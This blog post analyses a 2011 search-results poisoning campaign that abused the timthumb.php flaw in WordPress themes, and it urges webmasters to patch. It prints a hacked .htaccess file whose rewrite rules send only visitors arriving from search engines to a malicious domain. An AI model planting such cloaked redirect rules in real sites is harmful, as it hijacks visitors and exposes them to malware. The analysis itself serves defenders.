Google search results poisoning or WordPress vulnerability ?

A visitor brings to my attention a weird fact: searching in Google for “social bookmarking sites” or “social bookmarking sites 2011″, on the first results page appears www.socialbookmarkingsiteslist.com:

hacked-website.jpg

 

Clicking on this result, take us not to the desired website supposed to contains a list with the most important social bookmarking sites but to http://sokoloperkovuskeci.com/in.php?g=193. The visitor who told me about this issue suggested that it’s about another search results poisoning and a quick search in Google for similar problems revealed that exactly this is the case here: a Google search results poisoning using a vulnerability found in some WordPress themes.

A lot of other computer users reported similar problems with their websites but only when using a search engine and clicking on search results, otherwise the websites are loading normally. Guilty for this seems to be a vulnerability in timthumb.php, a component of some WordPress themes used to generate thumbnails. According to Mark Maunder who first discovered this vulnerability, an unpatched timthumb.php file allows execution of arbitrary code in timthumb cache directory or can inject code in other legitimate WordPress php files. The consequences can be disastrous, malicious shell codes can be uploaded and executed or .htaccess file can be modified leading to malicious redirects as it is in our studied case.

.htaccess is a configuration file used by Apache web servers to manage the security restrictions or other configurations at directory level, so each directory on an Apache web server can contains a .htaccess file which will override the global web server configuration for that specific directory.

Using the .htaccess file we can enable the mod_rewrite engine on an Apache webserver allowing us to redirect the visitors at our willing. Example of usage:

RewriteEngine on
RewriteRule ^/foo\.html$ bar.html [R]

You can see more usages of .htaccess file here. The conclusion is if somebody modify the .htaccess file on the root directory of a website it can redirect the users to another website or this is exactly what happened in the malicious redirect that we are talking about in this article. Searching with Google we can see that more and more webmasters and common Internet users report this problem, see digitalpoint.com forum or WordPress support forum where an user discussed about this situation and posted the hacked .htaccess file:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http : // sokoloperkovuskeci . com / in . php ? g = 56 [R,L]
</IfModule>

We can see here another interesting fact, the visitors are redirected only if they are coming from a search engine, if they have a search engine(Google, Yahoo, Ask, Msn) as referer,  this is the rewrite condition. If you simply type the URL of a hacked website in the browser address bar and navigate there, the redirection is not performed.

If you run a WordPress site with a theme that are using timthumb.php(if you use thumbnails the chances are you have this file), it’s more than recommended to replace it with the new patched version, it can be found here . Also the website must be investigated looking for a strange behaviour or for modified php files.

The scaring thing is there are indications that this vulnerability was exploited for some time by hackers aimed as always by financial returns. Hacked websites lost their traffic for awhile and were in the position to be totally compromised by uploading and executing some malicious scripts(shells) on their web servers. We can easily imagine methods used by hackers to make money using this vulnerability, one is to steal traffic(visitors) and redirect it to their ads.

But what about the final target of this malicious redirect,  http://sokoloperkovuskeci.com ?

Well, a simple domain lookup reveals malformed(fake)??? details of the registrant:

Registrant Contact:
NA
Robert Duval admin@sokoloperkovuskedi.com
+15709877322 fax: +15709877322
1105 Nw 22nd Ave
Miami Florida 54353
us

……………………………………………………

DNS:
ns1.hoperjoper.ru
ns2.hoperjoper.ru

 

Even if it is about  sokoloperkovuskeci.com domain, the webmaster seems to be situated at sokoloperkovuskedi.com, see the difference.

I will try to contact the www.socialbookmarkingsiteslist.com webmaster, perhaps he does not even know that his website was hacked but is hard to reach him because the domain registration details are private. If you run a WordPress based website, I urge you to check it for this vulnerability.

Keep safe !

Posted in Thoughts.

3 Responses

Leave a Reply